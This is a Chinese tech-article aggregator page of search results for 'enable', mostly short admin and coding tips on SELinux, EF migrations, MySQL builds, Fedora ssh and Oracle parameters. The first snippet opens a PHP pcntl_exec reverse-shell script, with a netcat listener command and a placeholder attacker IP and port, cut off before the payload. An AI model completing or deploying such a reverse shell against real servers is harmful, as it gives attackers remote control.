码迷,mamicode.com
首页 >  
搜索关键字:enable    ( 5784个结果
php-pcntl_exec反弹脚本
https://www.t00ls.net/viewthread.php?tid=28086 <?php /******************************* *查看phpinfo编译参数--enable-pcntl *作者Spider *nc-vvlp443 ********************************/ $ip=‘xxx.xxx.xxx.xxx‘; $port=‘443‘; $file=‘/tmp/bc.pl‘; header("content-T..
分类:Web程序   时间:2014-11-20 15:37:45    阅读次数:511
sas宏(2),运行中创建宏与使用宏,proc sql创建宏, scl中宏处理(暂缺)
1:在程序运行中进行宏定义CALL routines that enable you to transfer information between an executing DATA step and the macro processor.You can use the SYMPUT routi...
分类:数据库   时间:2014-11-20 13:37:57    阅读次数:405
centos 7 上配置SELinux允许nginx指定/home/www作为网站根目录
现象: 1 启动nginx成功,使用wget 127.0.0.1得到内容,但是提示是禁止访问(403); 2 查看/var/log/nginx/error.log,提示访问/home/www/l.com/i.html禁止; 3 查看SELinux 是否运行: sestatus -v,enable就是运行了 4查看/var/log/Audit/Audit.log日志,发现有提示到nginx被...
分类:Web程序   时间:2014-11-20 00:06:55    阅读次数:720
EF修改model自动更新数据库
最近用MVC+EF学习时遇到修改model后而数据库没更新报错,就在网上找关于数据迁移自动更新数据库的,折腾了大半天终于弄了出来第一步:在程序包管理器控制台里: Enable-Migrations -ProjectName EF所在的项目名称第二步:运行后会在字段生成Migrations文件夹,Mi...
分类:数据库   时间:2014-11-19 18:09:52    阅读次数:200
VMware中装Win2012再配置Hyper-v,解决方法
VMware中装配Win2012再配置Hyper-v,解决虚拟机监控程序已经在运行中的方法找到虚拟机存放的位置,用记事本打开WindowsServer2012.vmx,在最后添加两行并保存:hypervisor.cpuid.v0="FALSE"mce.enable="TRUE"
分类:Windows程序   时间:2014-11-19 02:21:58    阅读次数:260
某公司平台部署 linx平台完整过程
部署网站平台 安装MySQL 编译安装MySQL-5.1 # ./configure --prefix=/usr/local/mysql--with-charset=utf8 --enable-assembler --with-extra-charsets=all--with-plugins=all 1 2 3 4 5 ...
分类:其他好文   时间:2014-11-19 01:50:00    阅读次数:823
app-framework学习--nav的Scroller禁用与启用
app-framewor(jqmobi) nav的Scroller禁用与启用 写在panel 的 data-load 方法里 禁用  $.ui.scrollingDivs.menu_scroller.disable(); 写在panel 的 data-unload  重新启用 $.ui.scrollingDivs.menu_scroller.enable(); 不会影响其他页...
分类:移动开发   时间:2014-11-18 11:53:21    阅读次数:200
No Cortex-M SW Device Found 解决方法
画原理图的时候为了使布线方便,使用了jlink的引脚。而STM32默认是设置为Jlink功能的,所以烧写代码的时候必须先关闭Jlink功能才能当做普通IO口使用,关闭代码如下:1 RCC_APB2PeriphClockCmd(RCC_APB2Periph_AFIO,ENABLE);2 ...
分类:其他好文   时间:2014-11-17 22:34:01    阅读次数:3559
Fedora 开启 ssh
Fedora 17 已经安装好openssh server了 不用再装 不过默认无开启首先su root1.开启ssh服务# systemctl start sshd.service2.随系统一起启动服务# systemctl enable sshd.service在terminal 中输 setu...
分类:其他好文   时间:2014-11-17 21:02:21    阅读次数:242
11G利用隐含参数,修改用户名
步骤概述:1. 停库,修改隐含参数_enable_rename_user 为true2. 以restrict方式启动数据库3. alter user aaaa rename to bbbb identified by bbbb123;4. 正常重启数据库以下是测试步骤:一、查看 隐含参数“_en.....
分类:其他好文   时间:2014-11-17 17:38:24    阅读次数:198
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!